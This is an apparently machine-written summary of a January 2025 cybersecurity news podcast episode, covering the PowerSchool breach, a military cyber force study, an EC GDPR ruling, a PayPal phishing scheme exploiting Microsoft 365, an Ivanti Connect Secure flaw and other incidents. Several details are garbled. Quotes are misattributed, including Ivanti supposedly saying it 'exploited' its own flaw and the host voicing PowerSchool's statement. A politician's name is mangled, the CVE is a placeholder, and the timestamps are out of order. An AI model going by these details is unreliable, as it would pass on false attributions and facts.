Cyber Security Headlines: PowerSchool Hacked, Cyber Force Study, EC Gets GDPR Fine

Hosted by CISO Series | Release Date: January 9, 2025

In this episode of Cyber Security Headlines, host Rich Stroffolino delves into the latest developments in the information security landscape. Covering significant breaches, legislative movements, regulatory fines, and emerging threats, this episode provides a comprehensive overview for cybersecurity professionals and enthusiasts alike.

1. PowerSchool Data Breach

Timestamp: [00:07]

Rich Stroffolino kicks off the episode by reporting a major breach involving PowerSchool, the leading edtech provider serving over 50 million students in the U.S. The company announced that on December 28th, threat actors successfully breached a customer support portal using compromised credentials.

• Data Compromised: Initially, PowerSchool confirmed the theft of names and addresses. However, the breach could potentially include Social Security numbers and other Personally Identifiable Information (PII), varying by district.

• Company Response: PowerSchool clarified in their FAQ that the incident was not a ransomware attack. Nevertheless, they conceded to an extortion demand to prevent data leakage.

• Mitigation Efforts: The company is offering credit monitoring services for affected adults and identity protection services for minors to safeguard against potential misuse of the compromised data.

Quote:
"We did not suffer a ransomware attack, but we did pay an extortion demand to prevent the data from being leaked," stated Rich Stroffolino at [00:07].

2. House Lawmakers Explore Cyber Force Study

Timestamp: [02:30]

The episode highlights ongoing legislative efforts to establish a dedicated cyber force within the U.S. Military. Representative Morgan Luttrell emphasizes the necessity for an independent assessment to evaluate the feasibility of a cyber force as a potential seventh branch of the military.

• Legislative Background: Last year, Luttrell sponsored an amendment to the Defense Policy Bill, mandating the Pentagon to commission a third-party study on creating a cyber force focused on digital warfare.

• Current Status: Although the bill was signed into law by President Biden, it lacks a deadline for the assessment's submission, causing delays and frustrations among lawmakers.

• Future Prospects: Luttrell indicated frustration with the recurring delays and hinted at escalating the issue to higher political figures, including future Vice President Van Advance, if the initiative is stalled for a third consecutive year.

Quote:
"The lack of a deadline is a huge headache," remarked Representative Luttrell at [02:45].

3. European Commission Fined for GDPR Violation

Timestamp: [04:15]

In a significant ruling, the European General Court found that the European Commission (EC) violated the General Data Privacy Regulation (GDPR) by transmitting a German citizen's personal data to the U.S.

• Case Details: The individual initiated the lawsuit after noticing that using a Facebook sign-in option on an event site led to the transmission of device, browser, and IP address information to Amazon and Meta.

• Legal Implications: GDPR classifies such data as personal information. While GDPR permits substantial fines for violations, the court mandated the EC to pay €400 to the plaintiff.

Quote:
"The European Commission violated GDPR by transmitting personal data without adequate protections," explained Rich Stroffolino at [04:15].

4. PayPal Fraud Scheme Exploits Microsoft 365 Features

Timestamp: [05:50]

Fortinet CISO Carl Windsor shed light on a sophisticated phishing campaign exploiting Microsoft 365's features to perpetrate fraud through PayPal.

• Attack Vector: Threat actors register free Microsoft 365 test domains to dispatch emails, which typically bypass standard email security checks due to their legitimate Microsoft.com domains.

• Methodology: Victims receive spoofed PayPal money requests that appear to come from a billing department. Clicking the embedded link and logging into PayPal inadvertently links the victim's account to the attacker, facilitating account takeovers.

• Defense Recommendations: Windsor urges users to remain vigilant and employ common sense when encountering suspicious email addresses, even if they pass through basic spam filters.

Quote:
"Use common sense on fishy-looking email addresses, even if they get past basic spam filters," advised Carl Windsor at [05:50].

5. Akamai to Terminate CDN Services in China

Timestamp: [06:40]

Akamai Technologies announced it will cease its Content Delivery Network (CDN) services in China by June 30, 2026. This decision is influenced by regulatory challenges and strategic business realignment.

• Migration Support: Akamai will assist customers in transitioning to Tencent Cloud or Wangsu Science and Technology, and support migrations to CDNs outside China.

• Business Shift: CEO Tom Leighton noted in the Q3 earnings call that Akamai is pivoting towards higher-growth areas like compute and security services, which now constitute the majority of the company's revenue.

Quote:
"We are focusing on higher growth areas rather than traditional CDN services in the market," stated Akamai CEO Tom Leighton, as referenced by Rich Stroffolino at [06:40].

6. Shadow IT Challenges for Hackers

Timestamp: [07:30]

A study by Watchtower Labs reveals that shadow IT is a significant issue not only for Chief Information Security Officers (CISOs) but also for hackers. Benjamin Harris and Elise Hammond detail how interconnected infrastructures used by hackers introduce vulnerabilities.

• Research Findings: The team identified entry points into thousands of live backdoors created by hackers, enabling the tracking of compromised hosts and potential control over them.

• Implications: Attackers often leave behind outdated web shells containing code snippets that can compromise newer systems and domains, perpetuating ongoing hacking campaigns.

Quote:
"We successfully identified entry points into thousands of live backdoors being used by hackers," explained Benjamin Harris at [07:30].

7. Ivanti Alerts on Connect Secure Vulnerability

Timestamp: [07:55]

Ivanti has issued a warning regarding the exploitation of a Connect Secure remote code execution vulnerability (CVE-XXXXX) by threat actors aiming to install malware on affected appliances.

• Affected Products: The vulnerability impacts Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways. However, current exploits are confined to Ivanti Secure Connect appliances.

• Response Measures: Ivanti released security patches in firmware version 22.7R2.5 to address the flaw. Customers are urged to update immediately to mitigate potential threats.

Quote:
"We have only exploited it on Ivanti Secure Connect appliances," confirmed Ivanti at [07:55].

8. Follow-Up: ICAO and Green Bay Data Breaches

Timestamp: [07:40]

• International Civil Aviation Organization (ICAO): Recently confirmed a data breach where 42,000 records from its recruitment database were stolen. The compromised data includes names, email addresses, dates of birth, and employment history. Importantly, no financial information or passwords were affected.

• Green Bay Packers Online Store: A payment skimmer compromised 8,514 user accounts, including 16 in Maine. Victims were notified on January 6th and offered three years of credit monitoring as a remedial measure.

Quote:
"Threat actors stole 42,000 records from ICAO's recruitment database," reported Rich Stroffolino at [07:40].

9. Upcoming Episode: AI's Role in Cybersecurity

Timestamp: [08:00]

Looking ahead, Rich Stroffolino teases the next episode titled "Is AI Benefiting Attackers or Defenders?" This episode will explore how adversaries and defenders are leveraging artificial intelligence in the ongoing cybersecurity battle, questioning whether AI provides one side with a significant advantage or simply continues the traditional cat-and-mouse dynamic.

Quote:
"We've been mired in endless discussions on how adversaries and defenders are, or could be taking advantage of AI," hinted Rich Stroffolino at [08:07].

Conclusion

Today's episode of Cyber Security Headlines encapsulates critical incidents and trends shaping the cybersecurity domain. From large-scale data breaches and legislative initiatives to sophisticated phishing schemes and vulnerabilities within major platforms, the episode underscores the dynamic and ever-evolving challenges faced by organizations and individuals alike. Stay tuned for more insights and detailed analyses in upcoming episodes.

For more in-depth stories and daily updates, visit CISOseries.com.